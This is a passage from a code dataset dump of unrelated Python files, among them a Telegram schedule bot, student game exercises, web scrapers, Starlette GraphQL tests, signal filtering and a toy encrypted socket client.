>= schedule[scene][0][0]:\n started = True\n break\n\n if not started:\n result = starting_soon_text\n for stage in STAGES_ORDER:\n if stage in schedule:\n first_entry = schedule[stage][0]\n result += \"\\n\\n\" + stage + \":\\n\"\n result += format_artist(first_entry[0], first_entry[1])\n\n result += \"\\n\"\n return result\n\n\n else:\n result = playing_now_text\n for stage in STAGES_ORDER:\n if stage in schedule:\n first_entry = schedule[stage][0]\n if first_entry[0] > time:\n result += \"\\n\\n\" + stage + \":\\n\"\n result += format_artist(first_entry[0], first_entry[1])\n else:\n current_entry = first_entry\n for next_entry in schedule[stage][1:]:\n if next_entry[0] >= time:\n result += \"\\n\\n\" + stage + \":\\n\"\n result += format_artist(current_entry[0], current_entry[1]) + \"\\n\"\n result += format_artist(next_entry[0], next_entry[1])\n\n break\n\n current_entry = next_entry\n\n result += \"\\n\"\n\n if result == playing_now_text + \"\\n\": # all the stages have finished\n result = over_text + \"\\n\"\n\n return result\n\n\ndef playing_now():\n return playing_at(datetime.datetime.now())\n\n\ndef start(bot, update):\n chat_id = update.message.chat.id\n\n buttons_list = make_buttons_list()\n menu = build_menu(buttons_list, 1)\n markup = InlineKeyboardMarkup(menu)\n bot.sendMessage(text=playing_now(), chat_id=chat_id, reply_markup=markup)\n\n\ndef build_menu(buttons, n_cols):\n menu = [buttons[i:i + n_cols] for i in range(0, len(buttons), n_cols)]\n return menu\n\n\ndef make_buttons_list():\n buttons_list = [InlineKeyboardButton(\"Обновить\", callback_data='update')]\n\n return buttons_list\n\n\ndef button(bot, update):\n query = update.callback_query\n data = query.data\n chat_id = query.message.chat.id\n\n if data == 'update':\n buttons_list = make_buttons_list()\n menu = build_menu(buttons_list, 1)\n markup = InlineKeyboardMarkup(menu)\n bot.sendMessage(text=playing_now(), chat_id=query.message.chat.id, reply_markup=markup)\n\n\ndef handle_message(bot, update):\n chat_id = update.message.chat.id\n\n buttons_list = make_buttons_list()\n menu = build_menu(buttons_list, 1)\n markup = InlineKeyboardMarkup(menu)\n bot.sendMessage(text=test_suite(), chat_id=chat_id, reply_markup=markup)\n\n\nstart_handler = CommandHandler('start', start)\nbutton_handler = CallbackQueryHandler(button)\ntext_handler = MessageHandler(Filters.text, handle_message)\ntest_handler = CommandHandler('test', test, pass_args=True)\n\ndispatcher.add_handler(start_handler)\ndispatcher.add_handler(button_handler)\ndispatcher.add_handler(text_handler)\ndispatcher.add_handler(test_handler)\n\nif __name__ == '__main__':\n updater.start_polling()","sub_path":"now.py","file_name":"now.py","file_ext":"py","file_size_in_byte":8944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"163385589","text":"# vim: set fileencoding=utf-8 :\n'''\n\n$ > python3 jogo_nim.py\n\nBem-vindo ao jogo do NIM! Escolha:\n\n1 - para jogar uma partida isolada\n2 - para jogar um campeonato 2\n\nVoce escolheu um campeonato!\n\n**** Rodada 1 ****\n\nQuantas peças? 3\nLimite de peças por jogada? 1\n\nComputador começa!\n\nO computador tirou uma peça.\nAgora restam 2 peças no tabuleiro.\n\nQuantas peças você vai tirar? 2\n\nOops! Jogada inválida! Tente de novo.\n\nQuantas peças você vai tirar? 1\n\nVocê tirou uma peça.\nAgora resta apenas uma peça no tabuleiro.\n\nO computador tirou uma peça.\nFim do jogo! O computador ganhou!\n\n**** Rodada 2 ****\n\nQuantas peças? 
3\nLimite de peças por jogada? 2\n\nVoce começa!\n\nQuantas peças você vai tirar? 2\nVoce tirou 2 peças.\nAgora resta apenas uma peça no tabuleiro.\n\nO computador tirou uma peça.\nFim do jogo! O computador ganhou!\n\n**** Rodada 3 ****\n\nQuantas peças? 4\nLimite de peças por jogada? 3\n\nVoce começa!\n\nQuantas peças você vai tirar? 2\nVoce tirou 2 peças.\nAgora restam 2 peças no tabuleiro.\n\nO computador tirou 2 peças.\nFim do jogo! O computador ganhou!\n\n**** Final do campeonato! ****\n\nPlacar: Você 0 X 3 Computador '''\n\n#if __name__ == \"__partida()__\":\ndef partida():\n print(\"\\n\\\n Bem-vindo ao jogo do NIM! Escolha: \\n\\\n \\n\\\n 1 - para jogar uma partida isolada \\n\\\n 2 - para jogar um campeonato 2 \")\n modo = int(input(\"\"))\n if modo == 1 or modo == 2:\n if modo == 1:\n print(\"\\n\\\n Voce escolheu rodada unica! \\n\\\n \\n\\\n **** Rodada unica ****\\n \")\n teste = False\n while teste == False:\n n = int(input(\"Quantas peças? \"))\n m = int(input(\"Limite de peças por jogada? \"))\n if n > 0 and n > m:\n if n % (m + 1) == 0:\n print(\"\\n\\\n Voce começa!\\n\")\n vencedor = False\n total = n\n while vencedor == False:\n peca = usuario_escolhe_jogada(total, m)\n total = total - peca\n print(\"\\n\\\n Voce tirou \",peca, \" peça.\\n\\\n Agora restam \",total,\"peças no tabuleiro.\\n\")\n if total <= 0:\n print(\"Voce Ganhou\")\n return\n computador_escolhe_jogada(total, m)\n total = total - computador_escolhe_jogada(total, m)\n print(\"\\n\\\n O computador tirou \",computador_escolhe_jogada(n, m),\" peça.\\n\\\n Agora restam \",total,\"peças no tabuleiro.\\n\")\n if total <= 0:\n print(\"Computador Venceu.\")\n return\n teste = True\n else:\n print(\"\\n\\\n Computador começa!\\n\")\n vencedor = False\n total = n\n while vencedor == False:\n computador_escolhe_jogada(total, m)\n total = total - computador_escolhe_jogada(total, m)\n print(\"\\n\\\n O computador tirou \",computador_escolhe_jogada(total, m),\" peça.\\n\\\n Agora restam \",total,\"peças no tabuleiro.\\n\")\n if total <= 0:\n print(\"Computador Venceu.\")\n return\n user = usuario_escolhe_jogada(total, m) \n total = total - user\n print(\"\\n\\\n Voce tirou \",user, \" peça.\\n\\\n Agora restam \",total,\"peças no tabuleiro.\\n\")\n if n <= 0:\n print(\"Voce Ganhou\")\n return\n else:\n teste = False\n elif modo == 2:\n campeonato()\n else:\n return partida()\n\n# funcao que pergunta quem comeca e quantas pecas.\n# funcao que vai chamar as outras funcoes\n# funcao que vai ficar com lacos para comandar quantas pecas de (n, m)\n# foram retiradas.\n# funcao que finaliza o game (n == 0)\n# variaveis (n and m) NAO NAO NAO NAO deverao ser globais\n\n#def partida(n, m):\n\n#return True\n\n# funcao tera que devolver quantas pecas foram removidas\ndef computador_escolhe_jogada(n, m):\n if n <= m:\n m = n\n n = n - m\n return m\n elif n % (m + 1) == 0:\n for i in range(1, m):\n if n % (m+1) :\n m = m - i\n #if m > 3:\n # m -= 3\n n = n - m\n return m\n else:\n teste = n % (m + 1)\n m = teste\n n = n - m\n return m\n# print(\"\\n\\\n# O computador tirou \",m,\" peça.\\n\\\n# Agora restam \",n,\"peças no tabuleiro.\\n\")\n\n# funcao tera que devolver quantas pecas foram removidas\ndef usuario_escolhe_jogada(n, m):\n tt = False\n while tt == False:\n valor = int(input(\"Quantas peças você vai tirar? \"))\n if valor < 1 or valor > m:\n print(\"\\n\\\n Oops! Jogada inválida! 
Tente de novo.\")\n tt = False\n elif valor >= 1 or valor < m:\n return valor\n tt = True\n\n\n\n# funcao que chama *partida() 3 vezes\ndef campeonato():\n jogos = 0\n print(\"\\n\\\n Voce escolheu um campeonato! \\n\\\n \\n\\\n **** Rodada 1 ****\\n \")\n partida(n, m)\npartida()\n","sub_path":"usp_1/semana5/release_9p.py","file_name":"release_9p.py","file_ext":"py","file_size_in_byte":5763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"329988225","text":"\r\n\r\n# taş, kağıt, makas oyunu\r\n\r\nprint (\"Taş,Kağıt, Makas oyununa hoş geldiniz\")\r\nprint (\"Rakibiniz bilgisayar...\")\r\n\r\ntas = 1\r\nkagit = 2\r\nmakas = 3\r\n\r\nBil_Skor= 0 # Bilgisayarin Puani\r\nOyuncu_Skor = 0 # Oyuncunun Puani\r\n\r\noyun_sayi = 10 # Oyun Sayisi Sinirlamasi\r\n\r\n\r\nwhile True:\r\n print(\"Kalan Oyun Sayısı \\\"{}\\\"\".format(oyun_sayi))\r\n import random\r\n bil_secim = random.randint(1, 3) #Bilgisayar random ile secim yapiyor\r\n Oyuncu = int(input(\"tas ise 1, kagıt ise 2, makas ise 3 tusuna basiniz...\")) #Oyuncunun tercihi\r\n\r\n if(Oyuncu == 1):\r\n print(\"\\n{}\\t{}\\n\".format(bil_secim,Oyuncu))\r\n if(bil_secim == 1): # Berabere\r\n print(\"Berabere, Skor Degismedi..\")\r\n elif(bil_secim == 2): #Kazanan bilgisayar\r\n Bil_Skor = Bil_Skor + 1\r\n print(\"Bilgisayar Kazandı.. Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n elif(bil_secim == 3): #Kazanan Oyuncu\r\n Oyuncu_Skor = Oyuncu_Skor + 1\r\n print(\"Siz Kazandız.. Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n\r\n elif(Oyuncu == 2):\r\n print(\"\\n{}\\t{}\\n\".format(bil_secim,Oyuncu))\r\n if (bil_secim == 1): #Kazanan oyuncu\r\n Oyuncu_Skor = Oyuncu_Skor + 1\r\n print(\"Siz Kazandıniz... Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n elif (bil_secim == 2): #Berabere\r\n print(\"Berabere, Skor Degismedi...\")\r\n elif (bil_secim == 3): #Kazanan bilgisayar\r\n Bil_Skor = Bil_Skor + 1\r\n print(\"Bilgisayar Kazandı... Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n\r\n elif (Oyuncu == 3):\r\n print(\"\\n{}\\t{}\\n\".format(bil_secim,Oyuncu))\r\n if (bil_secim == 1): #Kazanan cHand\r\n Bil_Skor = Bil_Skor + 1\r\n print(\"Bilgisayar Kazandı.. Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n elif (bil_secim == 2): #Kazanan Bilgisayar\r\n Oyuncu_Skor = Oyuncu_Skor + 1\r\n print(\"Siz Kazandız.. 
Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n oyun_sayi = oyun_sayi - 1\r\n elif (bil_secim == 3): #Berabere\r\n print(\"Berabere, Skor Degismedi..\")\r\n\r\n if oyun_sayi == 0:\r\n print(\"10 Tur Bitti...\")\r\n print(\"Skor: Bilgisayar = {}, Oyuncu = {}\".format(Bil_Skor,Oyuncu_Skor))\r\n\r\n break\r\n\r\n\r\n\r\n","sub_path":"TasKagitMakas2.py","file_name":"TasKagitMakas2.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"208697326","text":"\n\n\n# ============= YOUR CODE HERE ==============\n#Runs with python3 on coderunner-SEPT-2017\n#code creates a file called gender_degree_data.tsv that contains all data about the gender breakdowns of various degree majors in the US.\n#===========================================\nimport requests\nfrom bs4 import BeautifulSoup\n\nwith open('gender_degree_data.tsv', 'w') as out_file:\n\tout_file.write('\\t'.join(['Year', 'Degree_Major','Total_Bachelors','Percent_change_Bachelors','Male_Bachelors', 'Female_Bachelors', 'Female_percent_Bachelors','Total_Masters', 'Male_Masters', 'Female_Masters','Total_Doctorates','Male_Doctorates', 'Female_Doctorates']) + '\\n')\n\n\tr = requests.get('http://nces.ed.gov/programs/digest/current_tables.asp')\n\t#print(r.url)\n\tsoup = BeautifulSoup(r.text,\"html.parser\")\n\t#print(soup.prettify())\n\tfor link in soup.find_all('a', href=True):\n\t\tif 'dt16_325' in link.get(\"href\"):\n\t\t\t#print(link.get(\"href\"))\n\t\t\turl = 'http://nces.ed.gov/programs/digest/{}'.format(link['href'])\n\t\t\turl_response = requests.get(url)\n\t\t\turl_response = BeautifulSoup(url_response.text, \"html.parser\")\n\t\t\tdegree_major = url_response.find('title').text.split('Degrees in')[1].split('conferred')[0].strip()\n\t\t\t#print(degree_major)\n\t\t\tall_trs = url_response.find_all('tr')\n\t\t\tfor tr in all_trs:\n\t\t\t\t\t\t\t\t# We only want to parse entries that correspond to a certain year\n\t\t\t\tyear_header = tr.find('th')\n\t\t\t\tif year_header is None:\n\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\t\t# Stop parsing after all of the years are listed\n\t\t\t\tif 'Percent change' in year_header.text:\n\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t# Years always have a dash (-) in them\n\t\t\t\tif '-' not in year_header.text:\n\t\t\t\t\tcontinue\n\n\t\t\t\tyear = str(int(year_header.text.split('-')[0]) + 1)\n\t\t\t\tyear_vals = [x.text.replace(',', '').replace('†', '0').replace('#', '0') for x in tr.find_all('td')]\n\n\t\t\t\tout_text = '\\t'.join([year, degree_major] + year_vals) + '\\n'\n\t\t\tout_file.write(out_text)\n\n\n\n\n\t\t\t\n\n\n\n","sub_path":"Scrape_bs4_NCES.py","file_name":"Scrape_bs4_NCES.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"230094408","text":"import os\n\nimport graphene\nfrom graphql.execution.executors.asyncio import AsyncioExecutor\n\nfrom starlette.applications import Starlette\nfrom starlette.graphql import GraphQLApp\nfrom starlette.testclient import TestClient\n\nclass Query(graphene.ObjectType):\n hello = graphene.String(name=graphene.String(default_value=\"stranger\"))\n\n def resolve_hello(self, info, name):\n return \"Hello \" + name\n\nschema = graphene.Schema(query=Query)\napp = GraphQLApp(schema=schema)\nclient = TestClient(app)\n\n\ndef test_graphql_get():\n response = client.get(\"/?query={ hello }\")\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": 
\"Hello stranger\"}, \"errors\": None}\n\n\ndef test_graphql_post():\n response = client.post(\"/?query={ hello }\")\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\n\ndef test_graphql_post_json():\n response = client.post(\"/\", json={\"query\": \"{ hello }\"})\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\n\ndef test_graphql_post_graphql():\n response = client.post(\n \"/\", data=\"{ hello }\", headers={\"content-type\": \"application/graphql\"}\n )\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\n\ndef test_graphql_post_invalid_media_type():\n response = client.post(\"/\", data=\"{ hello }\", headers={\"content-type\": \"dummy\"})\n assert response.status_code == 415\n assert response.text == \"Unsupported Media Type\"\n\n\ndef test_graphql_put():\n response = client.put(\"/\", json={\"query\": \"{ hello }\"})\n assert response.status_code == 405\n assert response.text == \"Method Not Allowed\"\n\n\ndef test_graphql_no_query():\n response = client.get(\"/\")\n assert response.status_code == 400\n assert response.text == \"No GraphQL query found in the request\"\n\n\ndef test_graphql_invalid_field():\n response = client.post(\"/\", json={\"query\": \"{ dummy }\"})\n assert response.status_code == 400\n assert response.json() == {\n \"data\": None,\n \"errors\": [\n {\n \"locations\": [{\"column\": 3, \"line\": 1}],\n \"message\": 'Cannot query field \"dummy\" on type \"Query\".',\n }\n ],\n }\n\n\ndef test_graphiql_get():\n response = client.get(\"/\", headers={\"accept\": \"text/html\"})\n assert response.status_code == 200\n assert \"\" in response.text\n\n\ndef test_add_graphql_route():\n app = Starlette()\n app.add_route(\"/\", GraphQLApp(schema=schema))\n client = TestClient(app)\n response = client.get(\"/?query={ hello }\")\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\n\nclass ASyncQuery(graphene.ObjectType):\n hello = graphene.String(name=graphene.String(default_value=\"stranger\"))\n\n async def resolve_hello(self, info, name):\n return \"Hello \" + name\n\n\nasync_schema = graphene.Schema(query=ASyncQuery)\nasync_app = GraphQLApp(schema=async_schema, executor=AsyncioExecutor())\n\n\ndef test_graphql_async():\n client = TestClient(async_app)\n response = client.get(\"/?query={ hello }\")\n assert response.status_code == 200\n assert response.json() == {\"data\": {\"hello\": \"Hello stranger\"}, \"errors\": None}\n\nclass Upload(graphene.types.Scalar):\n @staticmethod\n def serialize(value):\n return value\n\n @staticmethod\n def parse_literal(node):\n return node\n\n @staticmethod\n def parse_value(value):\n return value\n\nclass UploadMutation(graphene.Mutation):\n class Arguments:\n file = Upload(required=True)\n\n success = graphene.Boolean()\n content = graphene.String()\n\n async def mutate(self, info, file):\n return UploadMutation(content=str(file, 'utf-8'), success=True)\n\nclass Mutation(graphene.ObjectType):\n uploadMutation = UploadMutation.Field()\n\n \nupload_app = GraphQLApp(schema=graphene.Schema(mutation=Mutation), executor=AsyncioExecutor())\n\ndef test_upload_graphql(tmpdir):\n path = os.path.join(tmpdir, \"test.txt\")\n with open(path, \"wb\") as file:\n file.write(b\"\")\n \n client = TestClient(upload_app)\n response = 
client.post(\"/\", data={\n \"variables\": '{ \"file\": \"\"}',\n \"query\" : 'mutation ($file: Upload!) { uploadMutation(file: $file) { success content } }',\n \"file_map\" : '{ \"file0\": \"file\" }',\n }, files = {\"file0\" : open(path, \"rb\")})\n # Fake Coverage\n assert Upload.serialize(1) == 1\n assert Upload.parse_literal(1) == 1\n # Fake Coverage\n assert response.status_code == 200\n assert response.json() == {'data': {'uploadMutation': {'content': '', 'success': True}},'errors': None}\n","sub_path":"tests/test_graphql.py","file_name":"test_graphql.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"640199012","text":"dia = int(input(\"Dia da semana:\t\"))\n\nif(dia<0 or dia>6):\n\tprint(\"A entrada\",dia,\"eh invalida\")\nelse:\n\tfut = int(input(\"Dias no futuro:\t\"))\n\tif(dia+fut>6):\n\t\tX = (dia+fut)%7\n\telse:\n\t\tX = dia+fut\n\n\tif(X==0):\n\t\tX = \"domingo\"\n\telif(X==1):\n\t\tX = \"segunda\"\n\telif(X==2):\n\t\tX = \"terca\"\n\telif(X==3):\n\t\tX = \"quarta\"\n\telif(X==4):\n\t\tX = \"quinta\"\n\telif(X==5):\n\t\tX = \"sexta\"\n\telif(X==6):\n\t\tX = \"sabado\"\n\t\n\tif(dia == 0):\n\t\tdia = \"domingo\"\n\telif(dia==1):\n\t\tdia = \"segunda\"\n\telif(dia==2):\n\t\tdia = \"terca\"\n\telif(dia==3):\n\t\tdia = \"quarta\"\n\telif(dia==4):\n\t\tdia = \"quinta\"\n\telif(dia==5):\n\t\tdia = \"sexta\"\n\telif(dia==6):\n\t\tdia = \"sabado\"\n\t\t\n\tprint(\"Hoje eh\",dia,\"e o dia futuro eh\",X)","sub_path":"5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/223/users/4481/codes/1679_1107.py","file_name":"1679_1107.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"638303668","text":"from selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import Options\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\noptions=Options()\r\noptions.add_argument(\"--headless\")\r\ndriver = webdriver.Firefox(firefox_options=options)\r\nx3=801\r\nlmain=[]\r\nwhile(x3<=810):\r\n print(\"processing reg number \",x3,\"\\n\")\r\n regnum=\"y16it\"+str(x3)\r\n driver.get(\"http://rvrjcce.ac.in/examcell/results/regnoresults.php\")\r\n sleep(1)\r\n x= driver.find_elements_by_tag_name(\"input\")\r\n x[0].send_keys(regnum)\r\n x[1].click()\r\n sleep(1)\r\n #####################################################################\r\n lis1=[]\r\n td=driver.find_elements_by_tag_name(\"td\")\r\n lis1.append(td[7].get_attribute(\"innerText\"))\r\n i=8\r\n k=[]\r\n j=0\r\n while (i 12):\r\n j = 0\r\n u=k.pop(0)\r\n k.insert(0,u)\r\n lis1.append(k)\r\n k=[]\r\n k.append(td[i].get_attribute(\"innerText\"))\r\n i=i+1\r\n j=j+1\r\n if(len(k)>0):\r\n u=k.pop(0)\r\n u=\"sem: \"+u\r\n k.insert(0,u)\r\n lis1.append(k)\r\n k=[]\r\n lmain.append([lis1,x3])\r\n x3=x3+1\r\n #####################################################################\r\nn=int(input(\"enter regnum\"))\r\nfor i in lmain:\r\n if(n==i[1]):\r\n for j in i[0]:\r\n print(j,\"\\n\")\r\ndriver.quit()\r\nprint(\"Finished\")\r\n","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"480581983","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt; plt.ion()\nimport scipy.signal as sgn\n\nq1 = True\nq2 = True\n\nsignal = 
np.loadtxt('signal.txt')\nfs = 500 # Hz\ndt = 1./fs # seconds\nt = np.linspace(0,dt*signal.shape[0],signal.shape[0],endpoint=False)\nN = len(signal)\n\n\n# Questão 1\nsig_fft = np.fft.rfft(signal)\nf_dimensionless = np.fft.rfftfreq(len(signal))\nT = dt*N\ndf = 1./T\nfhz_nf = f_dimensionless*df*N\n\nif q1:\n fig1 = plt.figure(figsize=(14,4.5))\n plt.title('Q1 (a)')\n plt.xlabel('tempo [s]')\n plt.ylabel('sinal ECG não filtrado [mV]')\n plt.plot(t,signal)\n plt.grid(b=True,which='both')\n plt.tight_layout()\n plt.savefig('Q1_a_sinal_nfilt.png')\n \n fig2 = plt.figure(figsize=(14,4.5))\n plt.title('Q1 (b)')\n plt.xlabel(u'frequência [Hz]')\n plt.ylabel(u'FFT do sinal ECG não filtrado')\n plt.plot(fhz_nf,sig_fft)\n plt.tight_layout()\n plt.savefig('Q1_b_espectro_nfilt.png')\n\n# Questão 2\n# (c)\nnotch_f = 50.3\nfny = fs/2.\n\nnotch_b, notch_a = sgn.iirnotch(notch_f/fny, 10)\nnotch_w, notch_h = sgn.freqz(notch_b, notch_a, worN=len(fhz_nf),fs=fs*2*np.pi)\n\nsig_notch = sgn.lfilter(notch_b,notch_a,signal)\n\nsig_fft_notch = np.fft.rfft(sig_notch)\nf_dimensionless_notch = np.fft.rfftfreq(len(sig_notch))\nT = dt*N\ndf = 1./T\nfhz_notch = f_dimensionless_notch*df*N\n\nif q2:\n fig3 = plt.figure(figsize=(14,4.5))\n plt.title('Q2 (c)')\n plt.xlabel('tempo [s]')\n plt.ylabel('sinal ECG filtrado Notch [mV]')\n plt.plot(t,sig_notch)\n plt.grid(b=True,which='both')\n plt.tight_layout()\n plt.savefig('Q2_c_sinal_filt_Notch.png')\n \n fig4 = plt.figure(figsize=(14,4.5))\n plt.title('Q2 (c)')\n plt.xlabel(u'frequência [Hz]')\n plt.ylabel('FFT sinal filtrado Notch ')\n plt.plot(fhz_notch,sig_fft_notch)\n plt.tight_layout()\n plt.savefig('Q2_c_espectro_filt_Notch.png')\n\n fig5 = plt.figure()\n plt.plot(notch_w/(2*np.pi), 20 * np.log10(abs(notch_h)))\n plt.xscale('log')\n plt.title('Filtro Notch')\n plt.xlabel(u'Frequência [Hz]')\n plt.ylabel(u'Amplitude [dB]')\n plt.margins(0, 0.1)\n plt.grid(which='both', axis='both')\n #plt.axvline(notch_fpass, color='green') # cutoff frequency\n plt.savefig('Q2_c_Notch_respfreq.png')\n\n'''\n# (b)\nhp_fpass = .7\nhp_fstop = .5\nfny = fs/2.\n#wpass = fpass*2*np.pi\n#wstop = fstop*2*np.pi\n#wny = fny*2*np.pi\n\nhp_ord, hp_wn = sgn.buttord(hp_fpass/fny,hp_fstop/fny,3,40)\n\n#b, a = sgn.butter(filt_ord, filt_wn, 'low')\nhp_b, hp_a = sgn.butter(4, hp_fpass/fny, 'highpass')\nhp_w, hp_h = sgn.freqz(hp_b, hp_a, worN=len(fhz_lp),fs=fs*2*np.pi)\n\nfig6 = plt.figure()\nplt.plot(hp_w/(2*np.pi), 20 * np.log10(abs(hp_h)))\nplt.xscale('log')\nplt.title('Filtro Butterworth PA')\nplt.xlabel(u'Frequência [Hz]')\nplt.ylabel('Amplitude [dB]')\nplt.margins(0, 0.1)\nplt.grid(which='both', axis='both')\nplt.axvline(hp_fpass, color='green') # cutoff frequency\n\nsig_lphp= sgn.lfilter(hp_b,hp_a,sig_lp)\n\nsig_fft_lphp = np.fft.rfft(sig_lphp)\nf_dimensionless_lphp = np.fft.rfftfreq(len(sig_lphp))\nT = dt*N\ndf = 1./T\nfhz_lphp = f_dimensionless_lphp*df*N\n\nif q2:\n fig7 = plt.figure(figsize=(14,4.5))\n plt.title('Q2 (b)')\n plt.xlabel('tempo [s]')\n plt.ylabel('sinal ECG filtrado PB + PA [mV]')\n plt.plot(t,sig_lphp)\n plt.grid(b=True,which='both')\n plt.tight_layout()\n plt.savefig('Q2_b_sinal_filt_PBPA.png')\n \n fig8 = plt.figure(figsize=(14,4.5))\n plt.title('Q2 (b)')\n plt.xlabel(u'frequência [Hz]')\n plt.ylabel('FFT sinal filtrado PB + PA')\n plt.plot(fhz_lphp,sig_fft_lphp)\n plt.tight_layout()\n 
plt.savefig('Q2_b_espectro_filt_PBPA.png')\n'''\n","sub_path":"TC1/develop/q2d.py","file_name":"q2d.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"212457479","text":"import cv2\nimport numpy as np\nimport cvui\nimport pyuv\n\n\nsrc1 = cv2.imread('resources/images/f1.jpg')\nsrc2 = cv2.imread('resources/images/f2.jpg')\nrows,cols = src1.shape[0],src1.shape[1]\nwindow = np.zeros((600,1024,3),dtype=src1.dtype)\nwindow[:] = (49, 52, 49)\n\nsrc1_rz = cv2.resize(src1,(cols//2,rows//2))\nsrc2_rz = cv2.resize(src2,(cols//2,rows//2))\nroi1 = window[10:rows//2+10,10:cols//2+10]\nroi1[:] = src1_rz\nroi2 = window[10:rows//2+10,20+cols//2:cols+20]\nroi2[:] = src2_rz\n\nroi_dst = window[20+rows//2:rows+20,20+cols//2:cols+20]\n\ndst = cv2.cuda.add(src1_rz,src2_rz)\nroi_dst[:] = dst\n\ncvui.init(\"CUDA:add\")\ndef wait_for_a_while(handler):\n \n cvui.imshow(\"CUDA:add\", window)\n \n cvui.update()\n key = cv2.waitKey(10)\n if key == 27:\n handler.close()\n\nloop = pyuv.Loop.default_loop()\nidler = pyuv.Idle(loop)\nloop = pyuv.Loop.default_loop()\nidler = pyuv.Idle(loop)\n\nidler.start(wait_for_a_while)\nloop.run()\n","sub_path":"projects/opencv-learning/python/cv4-cuda/01-add.py","file_name":"01-add.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399733737","text":"from django.forms.models import ModelForm\nfrom apps.notes.models import ModelNote\n\nclass FormNoteUpdate( ModelForm):\n class Meta:\n model = ModelNote\n fields = (\n 'title',\n 'description', \n 'tags',\n )\n \n def __init__(self, *args, **kwargs):\n super(FormNoteUpdate, self).__init__(*args, **kwargs)","sub_path":"apps/notes/FormNoteUpdate.py","file_name":"FormNoteUpdate.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"73816062","text":"#Jared Wheet - SWDV 660 Week 7 Assignment\n\n# Import socket module \nimport socket \nimport random \nfrom certificateAuthority import getKey, validateAuthenticity, getPublicKey\n\n \n# Create a socket object \ns = socket.socket() \n \n# Define the port on which you want to connect \nport = 9500 \nkey = random.randint(0,9) \n \n# connect to the server on local computer \n# s.connect(('127.0.0.1', port)) \n \nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect(('127.0.0.1', port))\n s.sendall(getKey('Hello World', True).encode('utf-8'))\n data = s.recv(1024)\n stringData = data.decode('utf-8')\n print('Client Received Certificate: ', stringData)\n\n response = validateAuthenticity(stringData)\n if response == 'server.py':\n print('Authenticated: ', response)\n else:\n print('Error: Unknown server certificate received!')\n \n s.sendall(getKey(str(key), True, getPublicKey()).encode('utf-8'))\n print('Sending: Private Session Key')\n data = s.recv(1024)\n print('Received: ', getKey(data.decode('utf-8'), False, key))\n\n print('Sending: This is some random data')\n s.sendall(getKey('This is some random data', True, key).encode('utf-8'))\n\n data = s.recv(1024)\n stringData = data.decode('utf-8')\n print('Received: ', getKey(stringData, False, key))","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"269094208","text":"import re\nimport sys\nimport 
argparse\nimport subprocess as sp\n\nparser = argparse.ArgumentParser(description='Process captions file.')\nparser.add_argument('--vid','-v',required=True,help='.mp4 video file')\nparser.add_argument('--rt','-t',required=True,help='Transcription file')\nparser.add_argument('--poi',required=True,help='POI ID')\nparser.add_argument('--counter',default=0,help='Utterance counter (for more videos)')\n\nargs = parser.parse_args()\n\n# frame counter\ni=int(args.counter)\n\n#\nactivation = False\n\nspk = 'id' + (args.poi).zfill(2)\n\nsp.Popen([\"mkdir\",spk]).wait()\n\nwith open(args.rt,'r') as rt, open('mp4.scp','a') as scp, open('text','a') as txt , open('utt2spk','a') as utt2spk:\n\n\tfor line in rt:\n\t\t# read times from line\n\t\ttimes = re.findall('\\d\\d:[0-5]\\d:[0-5]\\d.\\d\\d\\d',line)\n\n\t\t# if this is a times line\n\t\tif len(times) > 0:\n\t\t\t# if this is POI speech\n\t\t\tif line.split()[-1] == '1':\n\t\t\t\tbeg_t = 